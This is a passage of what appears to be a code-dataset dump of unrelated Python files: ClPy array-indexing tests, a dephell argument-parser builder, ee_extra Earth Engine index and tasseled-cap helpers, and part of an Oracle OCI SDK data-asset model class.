)},\n)\n@testing.with_requires('numpy>=1.12.0')\n@testing.gpu\nclass TestArrayInvalidIndex(unittest.TestCase):\n\n @testing.for_all_dtypes()\n @testing.numpy_clpy_raises()\n def test_invalid_getitem(self, xp, dtype):\n a = testing.shaped_arange(self.shape, xp, dtype)\n if self.transpose:\n a = a.transpose(self.transpose)\n a[self.indexes]\n\n\n@testing.gpu\nclass TestArrayIndex(unittest.TestCase):\n\n _multiprocess_can_split_ = True\n\n @testing.for_all_dtypes()\n @testing.numpy_clpy_array_equal()\n def test_setitem_constant(self, xp, dtype):\n a = xp.zeros((2, 3, 4), dtype=dtype)\n a[:] = 1\n return a\n\n @testing.for_all_dtypes()\n @testing.numpy_clpy_array_equal()\n def test_setitem_partial_constant(self, xp, dtype):\n a = xp.zeros((2, 3, 4), dtype=dtype)\n a[1, 1:3] = 1\n return a\n\n @testing.for_all_dtypes()\n @testing.numpy_clpy_array_equal()\n def test_setitem_copy(self, xp, dtype):\n a = xp.zeros((2, 3, 4), dtype=dtype)\n b = testing.shaped_arange((2, 3, 4), xp, dtype)\n a[:] = b\n return a\n\n @testing.for_all_dtypes()\n @testing.numpy_clpy_array_equal()\n def test_setitem_partial_copy(self, xp, dtype):\n a = xp.zeros((2, 3, 4), dtype=dtype)\n b = testing.shaped_arange((3, 2), xp, dtype)\n a[1, ::-1, 1:4:2] = b\n return a\n\n @testing.numpy_clpy_array_equal()\n def test_T(self, xp):\n a = testing.shaped_arange((2, 3, 4), xp)\n return a.T\n\n @testing.numpy_clpy_array_equal()\n def test_T_vector(self, xp):\n a = testing.shaped_arange((4,), xp)\n return a.T\n"} {"ext": "py", "sha": "1a313cea86a931fe57a3cc2a2237e526ec797163", "content": "# app\nfrom ..constants import FORMATS, LOG_FORMATTERS, LOG_LEVELS, REPOSITORIES, STRATEGIES, VERSION_SCHEMES\n\n\nenv_help = (\n 'Pipenv has 2 envs in same file: main and dev. '\n 'For poetry you can also use main-opt and dev-opt '\n 'that indicates to install optional requirements '\n 'from given env.'\n)\n\n\ndef build_config(parser):\n config_group = parser.add_argument_group('Configuration file')\n config_group.add_argument('-c', '--config', help='path to config file.')\n config_group.add_argument('-e', '--env', default='main', help='environment in config.')\n\n\ndef build_from(parser):\n from_group = parser.add_argument_group('Input file')\n from_group.add_argument('--from', help='path or format for reading requirements.')\n from_group.add_argument('--from-format', choices=FORMATS, help='format for reading requirements.')\n from_group.add_argument('--from-path', help='path to input file.')\n\n\ndef build_to(parser):\n to_group = parser.add_argument_group('Output file')\n to_group.add_argument('--to', help='path or format for writing requirements.')\n to_group.add_argument('--to-format', choices=FORMATS, help='output requirements file format.')\n to_group.add_argument('--to-path', help='path to output file.')\n\n\ndef build_resolver(parser):\n resolver_group = parser.add_argument_group('Resolver rules')\n resolver_group.add_argument('--strategy', choices=STRATEGIES, help='Algorithm to select best release.')\n resolver_group.add_argument('--prereleases', action='store_true', help='Allow prereleases')\n resolver_group.add_argument('--mutations', type=int, help='Maximum mutations limit')\n\n\ndef build_api(parser):\n api_group = parser.add_argument_group('APIs endpoints')\n api_group.add_argument('--warehouse', help='warehouse API URL.')\n api_group.add_argument('--bitbucket', help='bitbucket API URL.')\n api_group.add_argument('--repo', choices=REPOSITORIES, help='force repository for first-level deps.')\n\n\ndef build_output(parser):\n output_group = parser.add_argument_group('Console output')\n output_group.add_argument('--format', choices=LOG_FORMATTERS, help='output format.')\n output_group.add_argument('--level', choices=LOG_LEVELS, help='minimal level for log messages.')\n\n output_group.add_argument('--nocolors', action='store_true', help='do not color output.')\n output_group.add_argument('--silent', action='store_true', help='suppress any output except errors.')\n output_group.add_argument('--traceback', action='store_true', help='show traceback for exceptions.')\n output_group.add_argument('--filter', help='filter for JSON output.')\n\n\ndef build_venv(parser):\n venv_group = parser.add_argument_group('Virtual environment')\n venv_group.add_argument('--venv', help='path to venv directory for project.')\n venv_group.add_argument('--python', help='python version for venv.')\n\n\ndef build_other(parser):\n other_group = parser.add_argument_group('Other')\n\n other_group.add_argument('--cache-path', help='path to dephell cache')\n other_group.add_argument('--cache-ttl', type=int, help='Time to live for releases list cache')\n\n other_group.add_argument('--project', help='path to the current project')\n other_group.add_argument('--bin', help='path to the dir for installing scripts')\n\n other_group.add_argument('--envs', nargs='*', help='environments (main, dev) or extras to install')\n other_group.add_argument('--tests', nargs='*', help='paths to test files')\n other_group.add_argument('--versioning', choices=sorted(VERSION_SCHEMES), help='versioning scheme for project')\n"} {"ext": "py", "sha": "1a313ed7e184e08a66366fe00edbf9c4be0d4f6a", "content": "import json\nimport os\nimport re\nimport urllib.request\nimport warnings\nfrom typing import Optional, Union, Tuple, Dict\n\nimport ee\nimport pkg_resources\n\nfrom ee_extra.STAC.utils import _get_platform_STAC\nfrom ee_extra.utils import _load_JSON\n\n\ndef _get_expression_map(img: ee.Image, platformDict: dict) -> dict:\n \"\"\"Gets the dictionary required for the map parameter i n ee.Image.expression() method.\n\n Args:\n img : Image to get the dictionary from.\n platformDict : Dictionary retrieved from the _get_STAC_platform() method.\n\n Returns:\n Map dictionary for the ee.Image.expression() method.\n \"\"\"\n\n def lookupS2(img):\n return {\n \"A\": img.select(\"B1\"),\n \"B\": img.select(\"B2\"),\n \"G\": img.select(\"B3\"),\n \"R\": img.select(\"B4\"),\n \"RE1\": img.select(\"B5\"),\n \"RE2\": img.select(\"B6\"),\n \"RE3\": img.select(\"B7\"),\n \"N\": img.select(\"B8\"),\n \"N2\": img.select(\"B8A\"),\n \"WV\": img.select(\"B9\"),\n \"S1\": img.select(\"B11\"),\n \"S2\": img.select(\"B12\"),\n \"lambdaG\": 559.8,\n \"lambdaR\": 664.6,\n \"lambdaN\": 832.8,\n }\n\n def lookupL8(img):\n return {\n \"A\": img.select(\"B1\"),\n \"B\": img.select(\"B2\"),\n \"G\": img.select(\"B3\"),\n \"R\": img.select(\"B4\"),\n \"N\": img.select(\"B5\"),\n \"S1\": img.select(\"B6\"),\n \"S2\": img.select(\"B7\"),\n \"T1\": img.select(\"B10\"),\n \"T2\": img.select(\"B11\"),\n \"lambdaG\": 560.0,\n \"lambdaR\": 655.0,\n \"lambdaN\": 865.0,\n }\n\n def lookupL8C2(img):\n return {\n \"A\": img.select(\"SR_B1\"),\n \"B\": img.select(\"SR_B2\"),\n \"G\": img.select(\"SR_B3\"),\n \"R\": img.select(\"SR_B4\"),\n \"N\": img.select(\"SR_B5\"),\n \"S1\": img.select(\"SR_B6\"),\n \"S2\": img.select(\"SR_B7\"),\n \"T1\": img.select(\"ST_B10\"),\n \"lambdaG\": 560.0,\n \"lambdaR\": 655.0,\n \"lambdaN\": 865.0,\n }\n\n def lookupL45(img):\n return {\n \"B\": img.select(\"B1\"),\n \"G\": img.select(\"B2\"),\n \"R\": img.select(\"B3\"),\n \"N\": img.select(\"B4\"),\n \"S1\": img.select(\"B5\"),\n \"T1\": img.select(\"B6\"),\n \"S2\": img.select(\"B7\"),\n \"lambdaG\": 560.0,\n \"lambdaR\": 660.0,\n \"lambdaN\": 830.0,\n }\n\n def lookupL45C2(img):\n return {\n \"B\": img.select(\"SR_B1\"),\n \"G\": img.select(\"SR_B2\"),\n \"R\": img.select(\"SR_B3\"),\n \"N\": img.select(\"SR_B4\"),\n \"S1\": img.select(\"SR_B5\"),\n \"T1\": img.select(\"ST_B6\"),\n \"S2\": img.select(\"SR_B7\"),\n \"lambdaG\": 560.0,\n \"lambdaR\": 660.0,\n \"lambdaN\": 830.0,\n }\n\n def lookupL7(img):\n return {\n \"B\": img.select(\"B1\"),\n \"G\": img.select(\"B2\"),\n \"R\": img.select(\"B3\"),\n \"N\": img.select(\"B4\"),\n \"S1\": img.select(\"B5\"),\n \"T1\": img.select(\"B6\"),\n \"S2\": img.select(\"B7\"),\n \"lambdaG\": 560.0,\n \"lambdaR\": 660.0,\n \"lambdaN\": 835.0,\n }\n\n def lookupL7C2(img):\n return {\n \"B\": img.select(\"SR_B1\"),\n \"G\": img.select(\"SR_B2\"),\n \"R\": img.select(\"SR_B3\"),\n \"N\": img.select(\"SR_B4\"),\n \"S1\": img.select(\"SR_B5\"),\n \"T1\": img.select(\"ST_B6\"),\n \"S2\": img.select(\"SR_B7\"),\n \"lambdaG\": 560.0,\n \"lambdaR\": 660.0,\n \"lambdaN\": 835.0,\n }\n\n def lookupMOD09GQ(img):\n return {\n \"R\": img.select(\"sur_refl_b01\"),\n \"N\": img.select(\"sur_refl_b02\"),\n \"lambdaR\": 645.0,\n \"lambdaN\": 858.5,\n }\n\n def lookupMOD09GA(img):\n return {\n \"B\": img.select(\"sur_refl_b03\"),\n \"G\": img.select(\"sur_refl_b04\"),\n \"R\": img.select(\"sur_refl_b01\"),\n \"N\": img.select(\"sur_refl_b02\"),\n \"S1\": img.select(\"sur_refl_b06\"),\n \"S2\": img.select(\"sur_refl_b07\"),\n \"lambdaG\": 555.0,\n \"lambdaR\": 645.0,\n \"lambdaN\": 858.5,\n }\n\n def lookupMCD43A4(img):\n return {\n \"B\": img.select(\"Nadir_Reflectance_Band3\"),\n \"G\": img.select(\"Nadir_Reflectance_Band4\"),\n \"R\": img.select(\"Nadir_Reflectance_Band1\"),\n \"N\": img.select(\"Nadir_Reflectance_Band2\"),\n \"S1\": img.select(\"Nadir_Reflectance_Band6\"),\n \"S2\": img.select(\"Nadir_Reflectance_Band7\"),\n \"lambdaG\": 555.0,\n \"lambdaR\": 645.0,\n \"lambdaN\": 858.5,\n }\n\n lookupPlatform = {\n \"COPERNICUS/S2\": lookupS2,\n \"COPERNICUS/S2_SR\": lookupS2,\n \"LANDSAT/LC08/C01/T1_SR\": lookupL8,\n \"LANDSAT/LC08/C01/T2_SR\": lookupL8,\n \"LANDSAT/LC08/C02/T1_L2\": lookupL8C2,\n \"LANDSAT/LC08/C02/T2_L2\": lookupL8C2,\n \"LANDSAT/LC09/C02/T1_L2\": lookupL8C2,\n \"LANDSAT/LC09/C02/T2_L2\": lookupL8C2,\n \"LANDSAT/LE07/C01/T1_SR\": lookupL7,\n \"LANDSAT/LE07/C01/T2_SR\": lookupL7,\n \"LANDSAT/LE07/C02/T1_L2\": lookupL7C2,\n \"LANDSAT/LE07/C02/T2_L2\": lookupL7C2,\n \"LANDSAT/LT05/C01/T1_SR\": lookupL45,\n \"LANDSAT/LT05/C01/T2_SR\": lookupL45,\n \"LANDSAT/LT05/C02/T1_L2\": lookupL45C2,\n \"LANDSAT/LT05/C02/T2_L2\": lookupL45C2,\n \"LANDSAT/LT04/C01/T1_SR\": lookupL45,\n \"LANDSAT/LT04/C01/T2_SR\": lookupL45,\n \"LANDSAT/LT04/C02/T1_L2\": lookupL45C2,\n \"LANDSAT/LT04/C02/T2_L2\": lookupL45C2,\n \"MODIS/006/MOD09GQ\": lookupMOD09GQ,\n \"MODIS/006/MYD09GQ\": lookupMOD09GQ,\n \"MODIS/006/MOD09GA\": lookupMOD09GA,\n \"MODIS/006/MYD09GA\": lookupMOD09GA,\n \"MODIS/006/MOD09Q1\": lookupMOD09GQ,\n \"MODIS/006/MYD09Q1\": lookupMOD09GQ,\n \"MODIS/006/MOD09A1\": lookupMOD09GA,\n \"MODIS/006/MYD09A1\": lookupMOD09GA,\n \"MODIS/006/MCD43A4\": lookupMCD43A4,\n }\n\n if platformDict[\"platform\"] not in list(lookupPlatform.keys()):\n raise Exception(\n \"Sorry, satellite platform not supported for index computation!\"\n )\n\n return lookupPlatform[platformDict[\"platform\"]](img)\n\n\ndef _get_indices(online: bool) -> dict:\n \"\"\"Retrieves the dictionary of indices used for the index() method in ee.Image and ee.ImageCollection classes.\n\n Args:\n online : Wheter to retrieve the most recent list of indices directly from the GitHub repository and not from the local copy.\n\n Returns:\n Indices.\n \"\"\"\n if online:\n with urllib.request.urlopen(\n \"https://raw.githubusercontent.com/davemlz/awesome-ee-spectral-indices/main/output/spectral-indices-dict.json\"\n ) as url:\n indices = json.loads(url.read().decode())\n else:\n indices = _load_JSON(\"spectral-indices-dict.json\")\n\n return indices[\"SpectralIndices\"]\n\n\ndef _get_kernel_image(\n img: ee.Image, lookup: dict, kernel: str, sigma: Union[str, float], a: str, b: str\n) -> ee.Image:\n \"\"\"Creates an ee.Image representing a kernel computed on bands [a] and [b].\n\n Args:\n img : Image to compute the kernel on.\n lookup : Dictionary retrieved from _get_expression_map().\n kernel : Kernel to use.\n sigma : Length-scale parameter. Used for kernel = 'RBF'.\n a : Key of the first band to use.\n b : Key of the second band to use.\n\n Returns:\n Kernel image.\n \"\"\"\n if a not in list(lookup.keys()) or b not in list(lookup.keys()):\n return None\n else:\n lookupab = {\"a\": lookup[a], \"b\": lookup[b]}\n if isinstance(sigma, str):\n lookup = {**lookup, **lookupab, \"sigma\": img.expression(sigma, lookupab)}\n else:\n lookup = {**lookup, **lookupab, \"sigma\": sigma}\n kernels = {\n \"linear\": \"a * b\",\n \"RBF\": \"exp((-1.0 * (a - b) ** 2.0)/(2.0 * sigma ** 2.0))\",\n \"poly\": \"((a * b) + c) ** p\",\n }\n return img.expression(kernels[kernel], lookup)\n\n\ndef _remove_none_dict(dictionary: dict) -> dict:\n \"\"\"Removes elements from a dictionary with None values.\n\n Args:\n dictionary : Dictionary to remove None values.\n\n Returns:\n Curated dictionary.\n \"\"\"\n newDictionary = dict(dictionary)\n for key in dictionary.keys():\n if dictionary[key] is None:\n del newDictionary[key]\n return newDictionary\n\n\ndef _get_kernel_parameters(\n img: ee.Image, lookup: dict, kernel: str, sigma: Union[str, float]\n) -> dict:\n \"\"\"Gets the additional kernel parameters to compute kernel indices.\n\n Args:\n img : Image to compute the kernel parameters on.\n lookup : Dictionary retrieved from _get_expression_map().\n kernel : Kernel to use.\n sigma : Length-scale parameter. Used for kernel = 'RBF'.\n\n Returns:\n Kernel parameters.\n \"\"\"\n kernelParameters = {\n \"kNN\": _get_kernel_image(img, lookup, kernel, sigma, \"N\", \"N\"),\n \"kNR\": _get_kernel_image(img, lookup, kernel, sigma, \"N\", \"R\"),\n \"kNB\": _get_kernel_image(img, lookup, kernel, sigma, \"N\", \"B\"),\n \"kNL\": _get_kernel_image(img, lookup, kernel, sigma, \"N\", \"L\"),\n \"kGG\": _get_kernel_image(img, lookup, kernel, sigma, \"G\", \"G\"),\n \"kGR\": _get_kernel_image(img, lookup, kernel, sigma, \"G\", \"R\"),\n \"kGB\": _get_kernel_image(img, lookup, kernel, sigma, \"G\", \"B\"),\n \"kBB\": _get_kernel_image(img, lookup, kernel, sigma, \"B\", \"B\"),\n \"kBR\": _get_kernel_image(img, lookup, kernel, sigma, \"B\", \"R\"),\n \"kBL\": _get_kernel_image(img, lookup, kernel, sigma, \"B\", \"L\"),\n \"kRR\": _get_kernel_image(img, lookup, kernel, sigma, \"R\", \"R\"),\n \"kRB\": _get_kernel_image(img, lookup, kernel, sigma, \"R\", \"B\"),\n \"kRL\": _get_kernel_image(img, lookup, kernel, sigma, \"R\", \"L\"),\n \"kLL\": _get_kernel_image(img, lookup, kernel, sigma, \"L\", \"L\"),\n }\n\n return kernelParameters\n\n\ndef _get_tc_coefficients(platform: str) -> dict:\n \"\"\"Gets the platform-specific coefficient dictionary required for tasseled cap\n transformation.\n\n Platform matching is strict, meaning that data must be at the processing level\n specified by the reference literature that coefficients were sourced from, e.g.\n Landsat 8 SR cannot be transformed with Landsat 8 TOA coefficients.\n\n Args:\n platform : Platform name retrieved from the STAC.\n\n Returns:\n Map dictionary with band names and corresponding coefficients for brightness\n greenness, and wetness.\n\n Raises:\n Exception : If the platform has no supported coefficients.\n \"\"\"\n\n SENTINEL2_1C = {\n \"bands\": (\n \"B1\",\n \"B2\",\n \"B3\",\n \"B4\",\n \"B5\",\n \"B6\",\n \"B7\",\n \"B8\",\n \"B8A\",\n \"B9\",\n \"B10\",\n \"B11\",\n \"B12\",\n ),\n \"TCB\": (\n 0.2381,\n 0.2569,\n 0.2934,\n 0.3020,\n 0.3099,\n 0.3740,\n 0.4180,\n 0.3580,\n 0.3834,\n 0.0103,\n 0.0020,\n 0.0896,\n 0.0780,\n ),\n \"TCG\": (\n -0.2266,\n -0.2818,\n -0.3020,\n -0.4283,\n -0.2959,\n 0.1602,\n 0.3127,\n 0.3138,\n 0.4261,\n 0.1454,\n -0.0017,\n -0.1341,\n -0.2538,\n ),\n \"TCW\": (\n 0.1825,\n 0.1763,\n 0.1615,\n 0.0486,\n 0.0170,\n 0.0223,\n 0.0219,\n -0.0755,\n -0.0910,\n -0.1369,\n 0.0003,\n -0.7701,\n -0.5293,\n ),\n }\n\n # Zhai et al. 2022 also provide coefficients with the blue band, but\n # recommend omitting it due to difficulties in atmospheric correction.\n LANDSAT8_SR = {\n \"bands\": (\"SR_B3\", \"SR_B4\", \"SR_B5\", \"SR_B6\", \"SR_B7\"),\n \"TCB\": (0.4596, 0.5046, 0.5458, 0.4114, 0.2589),\n \"TCG\": (-0.3374, -0.4901, 0.7909, 0.0177, -0.1416),\n \"TCW\": (0.2254, 0.3681, 0.2250, -0.6053, -0.6298)\n }\n\n # Zhai et al. 2022 coefficients were included for L8 TOA over the Baig \n # et al. 2014 coefficients for consistency with the L8 SR coefficients, \n # which were not calculated by Baig et al.\n LANDSAT8_TOA = {\n \"bands\": (\"B3\", \"B4\", \"B5\", \"B6\", \"B7\"),\n \"TCB\": (0.4321, 0.4971, 0.5695, 0.4192, 0.2569),\n \"TCG\": (-0.3318, -0.4844, 0.7856, -0.0331, -0.1923),\n \"TCW\": (0.2633, 0.3945, 0.1801, -0.6121, -0.6066)\n }\n\n # Coefficients for Landsat 8 OLI are usable for Landsat 9 OLI-2, per\n # Zhai et al. 2022\n LANDSAT9_SR = LANDSAT8_SR\n LANDSAT9_TOA = LANDSAT8_TOA\n\n LANDSAT7_TOA = {\n \"bands\": (\"B1\", \"B2\", \"B3\", \"B4\", \"B5\", \"B7\"),\n \"TCB\": (0.3561, 0.3972, 0.3904, 0.6966, 0.2286, 0.1596),\n \"TCG\": (-0.3344, -0.3544, -0.4556, 0.6966, -0.0242, -0.2630),\n \"TCW\": (0.2626, 0.2141, 0.0926, 0.0656, -0.7629, -0.5388),\n }\n\n LANDSAT4_DN = {\n \"bands\": (\"B1\", \"B2\", \"B3\", \"B4\", \"B5\", \"B7\"),\n \"TCB\": (0.3037, 0.2793, 0.4743, 0.5585, 0.5082, 0.1863),\n \"TCG\": (-0.2848, -0.2435, -0.5435, 0.7243, 0.0840, -0.1800),\n \"TCW\": (0.1509, 0.1973, 0.3279, 0.3406, -0.7112, -0.4572),\n }\n\n LANDSAT4_SR = {\n \"bands\": (\"SR_B1\", \"SR_B2\", \"SR_B3\", \"SR_B4\", \"SR_B5\", \"SR_B7\"),\n \"TCB\": (0.2043, 0.4158, 0.5524, 0.5741, 0.3124, 0.2303),\n \"TCG\": (-0.1603, -0.2819, -0.4934, 0.7940, -0.0002, -0.1446),\n \"TCW\": (0.0315, 0.2021, 0.3102, 0.1594, -0.6806, -0.6109),\n }\n\n LANDSAT5_DN = {\n \"bands\": (\"B1\", \"B2\", \"B3\", \"B4\", \"B5\", \"B7\"),\n \"TCB\": (0.2909, 0.2493, 0.4806, 0.5568, 0.4438, 0.1706),\n \"TCG\": (-0.2728, -0.2174, -0.5508, 0.7221, 0.0733, -0.1648),\n \"TCW\": (0.1446, 0.1761, 0.3322, 0.3396, -0.6210, -0.4186),\n }\n\n MODIS_NBAR = {\n \"bands\": (\n \"Nadir_Reflectance_Band1\",\n \"Nadir_Reflectance_Band2\",\n \"Nadir_Reflectance_Band3\",\n \"Nadir_Reflectance_Band4\",\n \"Nadir_Reflectance_Band5\",\n \"Nadir_Reflectance_Band6\",\n \"Nadir_Reflectance_Band7\",\n ),\n \"TCB\": (0.4395, 0.5945, 0.2460, 0.3918, 0.3506, 0.2136, 0.2678),\n \"TCG\": (-0.4064, 0.5129, -0.2744, -0.2893, 0.4882, -0.0036, -0.4169),\n \"TCW\": (0.1147, 0.2489, 0.2408, 0.3132, -0.3122, -0.6416, -0.5087),\n }\n\n platformCoeffs = {\n \"COPERNICUS/S2\": SENTINEL2_1C,\n \"MODIS/006/MCD43A4\": MODIS_NBAR,\n \"LANDSAT/LC09/C02/T1_L2\": LANDSAT9_SR,\n \"LANDSAT/LC09/C02/T1_TOA\": LANDSAT9_TOA,\n \"LANDSAT/LC08/C02/T1_L2\": LANDSAT8_SR,\n \"LANDSAT/LC08/C02/T2_L2\": LANDSAT8_SR,\n \"LANDSAT/LC08/C01/T1_TOA\": LANDSAT8_TOA,\n \"LANDSAT/LC08/C01/T1_RT_TOA\": LANDSAT8_TOA,\n \"LANDSAT/LC08/C01/T2_TOA\": LANDSAT8_TOA,\n \"LANDSAT/LE07/C01/T1_TOA\": LANDSAT7_TOA,\n \"LANDSAT/LE07/C01/T1_RT_TOA\": LANDSAT7_TOA,\n \"LANDSAT/LE07/C01/T2_TOA\": LANDSAT7_TOA,\n \"LANDSAT/LT05/C01/T1\": LANDSAT5_DN,\n \"LANDSAT/LT05/C01/T2\": LANDSAT5_DN,\n \"LANDSAT/LT04/C02/T1_L2\": LANDSAT4_SR,\n \"LANDSAT/LT04/C02/T2_L2\": LANDSAT4_SR,\n \"LANDSAT/LT04/C01/T1\": LANDSAT4_DN,\n \"LANDSAT/LT04/C01/T2\": LANDSAT4_DN,\n }\n\n\n if platform not in list(platformCoeffs.keys()):\n raise Exception(\n \"Sorry, satellite platform not supported for tasseled cap transformation! Use one of \"\n + str(list(platformCoeffs.keys()))\n )\n\n return platformCoeffs[platform]\n\n\ndef _match_histogram(\n source: ee.Image,\n target: ee.Image,\n bands: Optional[Dict[str, str]],\n geometry: Optional[ee.Geometry],\n maxBuckets: int,\n) -> ee.Image:\n \"\"\"Adjust the histogram of an image to match a target image.\n\n Args:\n source : Image to adjust.\n target : Image to use as the histogram reference.\n bands : An optional dictionary of band names to match, with source bands as keys\n and target bands as values. If none is provided, bands will be matched by name.\n Any bands not included here will be dropped.\n geometry : The optional region to match histograms in that overlaps both images.\n If none is provided, the geometry of the source image will be used. If the\n source image is unbounded and no geometry is provided, histogram matching will\n fail.\n maxBuckets : The maximum number of buckets to use when building histograms. More\n buckets will require more memory and time but will generate more accurate\n results. The number of buckets will be rounded to the nearest power of 2.\n\n Returns:\n The adjusted image containing the matched source bands.\n \"\"\"\n\n def histogram_lookup(\n source_hist: ee.Array, target_hist: ee.Array\n ) -> Tuple[ee.List, ee.List]:\n \"\"\"Build a list of target values with corresponding counts to source values from a source and target histogram.\n\n Args:\n source_hist : A histogram for a source image returned by ee.Reducer.autoHistogram\n target_hist : A histogram for a target image returned by ee.Reducer.autoHistogram\n\n Returns:\n Source histogram values and target histogram values with corresponding counts.\n \"\"\"\n source_vals = source_hist.slice(1, 0, 1).project([0])\n source_counts = source_hist.slice(1, 1, 2).project([0])\n source_counts = source_counts.divide(source_counts.get([-1]))\n\n target_vals = target_hist.slice(1, 0, 1).project([0])\n target_counts = target_hist.slice(1, 1, 2).project([0])\n target_counts = target_counts.divide(target_counts.get([-1]))\n\n def lookup_value(n):\n \"\"\"Find the first target value with at least n counts.\"\"\"\n index = target_counts.gte(n).argmax()\n return target_vals.get(index)\n\n target_lookup_vals = source_counts.toList().map(lookup_value)\n\n return (source_vals.toList(), target_lookup_vals)\n\n geometry = ee.Element.geometry(source) if geometry is None else geometry\n\n source_bands = source.bandNames() if bands is None else list(bands.keys())\n target_bands = source.bandNames() if bands is None else list(bands.values())\n bands = ee.Dictionary.fromLists(source_bands, target_bands)\n\n source = source.select(source_bands)\n target = target.select(target_bands)\n\n source_histogram = source.reduceRegion(\n reducer=ee.Reducer.autoHistogram(maxBuckets=maxBuckets, cumulative=True),\n geometry=geometry,\n scale=30,\n maxPixels=1e13,\n bestEffort=True,\n )\n\n target_histogram = target.updateMask(source.mask()).reduceRegion(\n reducer=ee.Reducer.autoHistogram(maxBuckets=maxBuckets, cumulative=True),\n geometry=geometry,\n scale=30,\n maxPixels=1e13,\n bestEffort=True,\n )\n\n def match_bands(source_band: ee.String, target_band: ee.String) -> ee.Image:\n \"\"\"Match the histogram of one source band to a target band.\n\n Args:\n source_band : The name of a band in the source image to adjust.\n target_band : The name of a corresponding band in the target image to match to.\n\n Returns:\n The source band image histogram-matched to the target band.\n \"\"\"\n x, y = histogram_lookup(\n source_histogram.getArray(source_band),\n target_histogram.getArray(target_band),\n )\n matched = source.select([source_band]).interpolate(x, y)\n return matched\n\n matched = (\n ee.ImageCollection(bands.map(match_bands).values())\n .toBands()\n .rename(bands.keys())\n )\n\n # Preserve the metadata, band types, and band order of the source image.\n matched = ee.Image(matched.copyProperties(source, source.propertyNames()))\n matched = matched.cast(source.bandTypes(), source.bandNames())\n matched = matched.set(\"ee_extra:HISTOGRAM_TARGET\", target)\n\n # If the source image was bounded, clip the matched output to its bounds. If the source\n # image doesn't have a `geometry` this will fail, but that seems exceptionally rare.\n matched = ee.Algorithms.If(\n source.geometry().isUnbounded(),\n matched,\n matched.clip(source.geometry().bounds()),\n )\n\n return ee.Image(matched)\n"} {"ext": "py", "sha": "1a31402e86d05dd5dfa3c2d92780e0a2d814ef76", "content": "# coding: utf-8\n# Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.\n# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.\n\nfrom .update_data_asset_details import UpdateDataAssetDetails\nfrom oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401\nfrom oci.decorators import init_model_state_from_kwargs\n\n\n@init_model_state_from_kwargs\nclass UpdateDataAssetFromAtp(UpdateDataAssetDetails):\n \"\"\"\n Details for the Autonomous Transaction Processing data asset type.\n \"\"\"\n\n def __init__(self, **kwargs):\n \"\"\"\n Initializes a new UpdateDataAssetFromAtp object with values from keyword arguments. The default value of the :py:attr:`~oci.data_integration.models.UpdateDataAssetFromAtp.model_type` attribute\n of this class is ``ORACLE_ATP_DATA_ASSET`` and it should not be changed.\n The following keyword arguments are supported (corresponding to the getters/setters of this class):\n\n :param model_type:\n The value to assign to the model_type property of this UpdateDataAssetFromAtp.\n Allowed values for this property are: \"ORACLE_DATA_ASSET\", \"ORACLE_OBJECT_STORAGE_DATA_ASSET\", \"ORACLE_ATP_DATA_ASSET\", \"ORACLE_ADWC_DATA_ASSET\", \"MYSQL_DATA_ASSET\", \"GENERIC_JDBC_DATA_ASSET\", \"FUSION_APP_DATA_ASSET\", \"AMAZON_S3_DATA_ASSET\"\n :type model_type: str\n\n :param key:\n The value to assign to the key property of this UpdateDataAssetFromAtp.\n :type key: str\n\n :param model_version:\n The value to assign to the model_version property of this UpdateDataAssetFromAtp.\n :type model_version: str\n\n :param name:\n The value to assign to the name property of this UpdateDataAssetFromAtp.\n :type name: str\n\n :param description:\n The value to assign to the description property of this UpdateDataAssetFromAtp.\n :type description: str\n\n :param object_status:\n The value to assign to the object_status property of this UpdateDataAssetFromAtp.\n :type object_status: int\n\n :param object_version:\n The value to assign to the object_version property of this UpdateDataAssetFromAtp.\n :type object_version: int\n\n :param identifier:\n The value to assign to the identifier property of this UpdateDataAssetFromAtp.\n :type identifier: str\n\n :param external_key:\n The value to assign to the external_key property of this UpdateDataAssetFromAtp.\n :type external_key: str\n\n :param asset_properties:\n The value to assign to the asset_properties property of this UpdateDataAssetFromAtp.\n :type asset_properties: dict(str, str)\n\n :param registry_metadata:\n The value to assign to the registry_metadata property of this UpdateDataAssetFromAtp.\n :type registry_metadata: oci.data_integration.models.RegistryMetadata\n\n :param service_name:\n The value to assign to the service_name property of this UpdateDataAssetFromAtp.\n :type service_name: str\n\n :param driver_class:\n The value to assign to the driver_class property of this UpdateDataAssetFromAtp.\n :type driver_class: str\n\n :param credential_file_content:\n The value to assign to the credential_file_content property of this UpdateDataAssetFromAtp.\n :type credential_file_content: str\n\n :param wallet_secret:\n The value to assign to the wallet_secret property of this UpdateDataAssetFromAtp.\n :type wallet_secret: oci.data_integration.models.SensitiveAttribute\n\n :param wallet_password_secret:\n The value to assign to the wallet_password_secret property of this UpdateDataAssetFromAtp.\n :type wallet_password_secret: oci.data_integration.models.SensitiveAttribute\n\n :param region_id:\n The value to assign to the region_id property of this UpdateDataAssetFromAtp.\n :type region_id: str\n\n :param tenancy_id:\n The value to assign to the tenancy_id property of this UpdateDataAssetFromAtp.\n :type tenancy_id: str\n\n :param compartment_id:\n The value to assign to the compartment_id property of this UpdateDataAssetFromAtp.\n :type compartment_id: str\n\n :param autonomous_db_id:\n The value to assign to the autonomous_db_id property of this UpdateDataAssetFromAtp.\n :type autonomous_db_id: str\n\n :param default_connection:\n The value to assign to the default_connection property of this UpdateDataAssetFromAtp.\n :type default_connection: oci.data_integration.models.UpdateConnectionFromAtp\n\n \"\"\"\n self.swagger_types = {\n 'model_type': 'str',\n 'key': 'str',\n 'model_version': 'str',\n 'name': 'str',\n 'description': 'str',\n 'object_status': 'int',\n 'object_version': 'int',\n 'identifier': 'str',\n 'external_key': 'str',\n 'asset_properties': 'dict(str, str)',\n 'registry_metadata': 'RegistryMetadata',\n 'service_name': 'str',\n 'driver_class': 'str',\n 'credential_file_content': 'str',\n 'wallet_secret': 'SensitiveAttribute',\n 'wallet_password_secret': 'SensitiveAttribute',\n 'region_id': 'str',\n 'tenancy_id': 'str',\n 'compartment_id': 'str',\n 'autonomous_db_id': 'str',\n 'default_connection': 'UpdateConnectionFromAtp'\n }\n\n self.attribute_map = {\n 'model_type': 'modelType',\n 'key': 'key',\n 'model_version': 'modelVersion',\n 'name': 'name',\n 'description': 'description',\n 'object_status': 'objectStatus',\n 'object_version': 'objectVersion',\n 'identifier': 'identifier',\n 'external_key': 'externalKey',\n 'asset_properties': 